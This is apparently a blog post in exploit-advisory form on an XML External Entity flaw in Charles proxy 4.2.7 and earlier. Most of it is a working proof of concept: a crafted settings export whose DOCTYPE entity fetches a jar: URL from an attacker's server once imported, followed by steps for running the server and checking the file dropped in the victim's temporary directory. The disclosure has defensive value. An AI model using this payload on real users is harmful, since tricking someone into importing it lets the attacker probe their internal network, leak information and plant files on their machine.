Charles 4.2.7 XML External Entity

Software Link:https://www.charlesproxy.com
Date:11.12.2018
Exploit Author:CK01
Version:<=4.2.7

Security Issue:

The XML External Entity vulnerability exists in the Charles import/export setup option. If the user imports the "Charles Settings.xml" of the attacker, the internal network may be detected and the information may be leaked.


POC:

1.Charles Setting.xml:(127.0.0.1 -> attacker's server )

<?xml version='1.0' encoding='UTF-8' ?>
<?charles serialisation-version='2.0' ?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "jar:http://127.0.0.1:2014/!/">]>
<charles-export>
  <proxyConfiguration>
    <enableSOCKSProxy>false</enableSOCKSProxy>
    <dynamicHTTPPort>false</dynamicHTTPPort>
    <dynamicSOCKSPort>false</dynamicSOCKSPort>
    <enableSOCKSTransparentHTTPProxying>true</enableSOCKSTransparentHTTPProxying>
    <port>8888</port>
    <SOCKSPort>8889</SOCKSPort>
    <decryptSSL>true</decryptSSL>
    <transparentProxy>false</transparentProxy>
    <preferIPv6addresses>false</preferIPv6addresses>
    <sslLocations>
      <locationPatterns>
        <locationMatch>
          <location>
            <host>*</host>
            <port>443</port>
          </location>
          <enabled>true</enabled>
        </locationMatch>
      </locationPatterns>
    </sslLocations>
    <defaultSOCKSTransparentHTTPProxyPorts>true</defaultSOCKSTransparentHTTPProxyPorts>
    <socksTransparentHTTPProxyPorts/>
    <socksTransparentHTTPProxyPortRanges/>
    <windowsConfiguration>
      <useHTTP>true</useHTTP>
      <useSOCKS>false</useSOCKS>
      <enableAtStartup>true</enableAtStartup>
    </windowsConfiguration>
    <macOSXConfiguration>
      <useHTTP>true</useHTTP>
      <useSOCKS>false</useSOCKS>
      <enableAtStartup>false</enableAtStartup>
    </macOSXConfiguration>
    <mozillaFirefoxConfiguration>
      <useHTTP>true</useHTTP>
      <useSOCKS>false</useSOCKS>
      <enableAtStartup>true</enableAtStartup>
    </mozillaFirefoxConfiguration>
  </proxyConfiguration>
  <recordingConfiguration>
    <limit>100</limit>
    <maxTransactions>0</maxTransactions>
    <maxWebSocketMessages>-1</maxWebSocketMessages>
    <ignoreHosts>
      <locationPatterns/>
    </ignoreHosts>
    <recordHosts>
      <locationPatterns/>
    </recordHosts>
  </recordingConfiguration>
  <accessControlConfiguration>
    <warn>true</warn>
    <ipRanges>
      <ipRange>
        <ip>
          <int>192</int>
          <int>168</int>
          <int>2</int>
          <int>43</int>
        </ip>
        <mask>
          <int>255</int>
          <int>255</int>
          <int>255</int>
          <int>255</int>
        </mask>
      </ipRange>
    </ipRanges>
  </accessControlConfiguration>
  <externalProxyConfiguration>
    <configurations>
      <entry>
        <string>socks</string>
        <mutableExternalProxyConfiguration>
          <active>false</active>
          <requiresAuthentication>false</requiresAuthentication>
          <port>0</port>
        </mutableExternalProxyConfiguration>
      </entry>
      <entry>
        <string>http</string>
        <mutableExternalProxyConfiguration>
          <active>true</active>
          <requiresAuthentication>false</requiresAuthentication>
          <host>127.0.0.1</host>
          <port>1087</port>
          <domain></domain>
          <username></username>
          <encryptedPassword>2aQ4yHV+W99fhLcoM+aSlQ==</encryptedPassword>
        </mutableExternalProxyConfiguration>
      </entry>
      <entry>
        <string>https</string>
        <mutableExternalProxyConfiguration>
          <active>true</active>
          <requiresAuthentication>false</requiresAuthentication>
          <host>127.0.0.1</host>
          <port>1087</port>
          <domain></domain>
          <username></username>
          <encryptedPassword>X7aDnIieHyR9nVYpOPBpBw==</encryptedPassword>
        </mutableExternalProxyConfiguration>
      </entry>
    </configurations>
    <enabled>true</enabled>
    <alwaysBypassLocalhost>true</alwaysBypassLocalhost>
  </externalProxyConfiguration>
  <throttlingConfiguration>
    <bandwidthDown>57.6</bandwidthDown>
    <bandwidthUp>33.6</bandwidthUp>
    <utilisationDown>70</utilisationDown>
    <utilisationUp>70</utilisationUp>
    <latency>250</latency>
    <reliability>100</reliability>
    <mtu>576</mtu>
    <lowQuality>100</lowQuality>
    <highQuality>100</highQuality>
    <stability>100</stability>
    <customPresets/>
    <hosts class="listAdapter">
      <list/>
    </hosts>
    <selectedHosts>false</selectedHosts>
  </throttlingConfiguration>
  <startupConfiguration>
    <newSession>true</newSession>
    <throttling>false</throttling>
    <checkUpdates>true</checkUpdates>
    <maximised>false</maximised>
    <fullscreen>false</fullscreen>
    <mainWindow>
      <x>171</x>
      <y>64</y>
      <width>1231</width>
      <height>770</height>
    </mainWindow>
    <currentDirectory>&file;</currentDirectory>
    <lastCheckUpdates>2018-11-12 07:40:37.437 UTC</lastCheckUpdates>
  </startupConfiguration>
  <userInterfaceConfiguration>
    <promptToSaveSessions>false</promptToSaveSessions>
    <promptToClearSession>false</promptToClearSession>
    <showLineNumbers>true</showLineNumbers>
    <lineWrap>true</lineWrap>
    <autoScroll>true</autoScroll>
    <combineHeadersAndBody>true</combineHeadersAndBody>
    <combineRequestAndResponse>true</combineRequestAndResponse>
    <minimiseToTray>false</minimiseToTray>
    <showMemoryUsage>false</showMemoryUsage>
    <enableHotkeys>true</enableHotkeys>
    <alwaysOnTop>false</alwaysOnTop>
    <showTrayIcon>true</showTrayIcon>
    <highlightTreeChanges>true</highlightTreeChanges>
    <sequenceFocused>false</sequenceFocused>
    <sessionNavStructureLayout>0</sessionNavStructureLayout>
    <sessionNavSequenceLayout>1</sessionNavSequenceLayout>
    <unitsSpeed>0</unitsSpeed>
    <unitsTime>0</unitsTime>
    <warningsSeen/>
    <properties>
      <entry>
        <string>SessionFrame.splitPlane.dividerLocation.horizontal</string>
        <int>300</int>
      </entry>
      <entry>
        <string>RequestResponsePanel.DIVIDER_LOCATON</string>
        <int>289</int>
      </entry>
      <entry>
        <string>SummaryPanel.TABLE_COLUMN_STATES</string>
        <columnStates/>
      </entry>
      <entry>
        <string>ChartPanel.SIZE_TABLE_COLUMN_STATES</string>
        <columnStates/>
      </entry>
      <entry>
        <string>ChartPanel.TIMELINE_TABLE_COLUMN_STATES</string>
        <columnStates/>
      </entry>
      <entry>
        <string>ChartPanel.DURATION_TABLE_COLUMN_STATES</string>
        <columnStates/>
      </entry>
      <entry>
        <string>SessionFrame.splitPlane.dividerLocation.vertical</string>
        <int>200</int>
      </entry>
      <entry>
        <string>SessionFrame.navTabs.mode</string>
        <string>Structure</string>
      </entry>
      <entry>
        <string>URLEncodedQueryViewer.TABLE_COLUMN_STATES</string>
        <columnStates/>
      </entry>
      <entry>
        <string>NavigatorJTable.TABLE_COLUMN_STATES</string>
        <columnStates/>
      </entry>
      <entry>
        <string>ChartPanel.TYPE_TABLE_COLUMN_STATES</string>
        <columnStates/>
      </entry>
    </properties>
  </userInterfaceConfiguration>
  <toolConfiguration>
    <configs>
      <entry>
        <string>Breakpoints</string>
        <breakpoints>
          <toolEnabled>false</toolEnabled>
          <breakpoints/>
        </breakpoints>
      </entry>
      <entry>
        <string>Reverse Proxies</string>
        <reverseProxies>
          <active>false</active>
          <reverseProxies/>
        </reverseProxies>
      </entry>
      <entry>
        <string>White List</string>
        <whitelist>
          <locations>
            <locationPatterns/>
          </locations>
          <toolEnabled>false</toolEnabled>
          <useSelectedLocations>false</useSelectedLocations>
          <action>0</action>
        </whitelist>
      </entry>
      <entry>
        <string>Map Remote</string>
        <map>
          <toolEnabled>false</toolEnabled>
          <mappings/>
        </map>
      </entry>
      <entry>
        <string>Port Forwarding</string>
        <portForwarding>
          <active>false</active>
          <portForwardings/>
        </portForwarding>
      </entry>
      <entry>
        <string>Viewer Mappings</string>
        <viewerMappings>
          <toolEnabled>false</toolEnabled>
          <mappings/>
        </viewerMappings>
      </entry>
      <entry>
        <string>Rewrite</string>
        <rewrite>
          <toolEnabled>false</toolEnabled>
          <debugging>false</debugging>
          <sets/>
        </rewrite>
      </entry>
      <entry>
        <string>Map Local</string>
        <mapLocal>
          <toolEnabled>false</toolEnabled>
          <mappings/>
        </mapLocal>
      </entry>
      <entry>
        <string>Black List</string>
        <blacklist>
          <locations>
            <locationPatterns/>
          </locations>
          <toolEnabled>false</toolEnabled>
          <useSelectedLocations>false</useSelectedLocations>
          <action>0</action>
        </blacklist>
      </entry>
      <entry>
        <string>Client Process</string>
        <selectedHostsTool>
          <locations>
            <locationPatterns/>
          </locations>
          <toolEnabled>false</toolEnabled>
          <useSelectedLocations>false</useSelectedLocations>
        </selectedHostsTool>
      </entry>
      <entry>
        <string>No Caching</string>
        <selectedHostsTool>
          <locations>
            <locationPatterns/>
          </locations>
          <toolEnabled>false</toolEnabled>
          <useSelectedLocations>false</useSelectedLocations>
        </selectedHostsTool>
      </entry>
      <entry>
        <string>DNS Spoofing</string>
        <dnsSpoofing>
          <toolEnabled>false</toolEnabled>
          <spoofs/>
        </dnsSpoofing>
      </entry>
      <entry>
        <string>Mirror</string>
        <mirror>
          <locations>
            <locationPatterns/>
          </locations>
          <toolEnabled>false</toolEnabled>
          <useSelectedLocations>false</useSelectedLocations>
        </mirror>
      </entry>
      <entry>
        <string>Auto Save</string>
        <autoSave>
          <toolEnabled>false</toolEnabled>
          <enableOnStartup>false</enableOnStartup>
          <saveLowMem>false</saveLowMem>
          <startOnMultiple>false</startOnMultiple>
          <savePeriod>0</savePeriod>
        </autoSave>
      </entry>
      <entry>
        <string>Block Cookies</string>
        <selectedHostsTool>
          <locations>
            <locationPatterns/>
          </locations>
          <toolEnabled>false</toolEnabled>
          <useSelectedLocations>false</useSelectedLocations>
        </selectedHostsTool>
      </entry>
    </configs>
  </toolConfiguration>
  <remoteControlConfiguration>
    <enabled>false</enabled>
    <allowAnonymous>false</allowAnonymous>
    <users/>
  </remoteControlConfiguration>
  <clientSSLCertificatesConfiguration>
    <certificates/>
  </clientSSLCertificatesConfiguration>
  <protobufConfiguration>
    <hideUnvaluedFields>true</hideUnvaluedFields>
    <cacheDescriptors>true</cacheDescriptors>
    <heuristicTTL>300000</heuristicTTL>
    <descriptors/>
  </protobufConfiguration>
  <gistConfiguration>
    <publishLimit>10</publishLimit>
    <secret>true</secret>
    <openGist>true</openGist>
    <enterpriseGitHub>false</enterpriseGitHub>
  </gistConfiguration>
  <focusConfiguration>
    <hosts>
      <locationPatterns/>
    </hosts>
  </focusConfiguration>
</charles-export>

2.The attacker executes on the server: java BlockingServer 2014 xxe.txt

3.xxe.txt on the attacker's server

  This file comes from the attacker server!

4.The victim temporary directory will generate the jar_cachexxxxxxxxxxxxx.tmp file with the content: "This file comes from the attacker server!"



reference:
http://www.pwntester.com/blog/2013/11/28/abusing-jar-downloads/
https://github.com/pwntester/BlockingServer
https://www.youtube.com/watch?v=eHSNT8vWLfc&feature=youtu.be

评论

此博客中的热门博文

Opencart-v3-0-3-0 user changes password at csrf vulnerability

内核漏洞辅助分析工具

Integer overflow vulnerability in pycryptodome module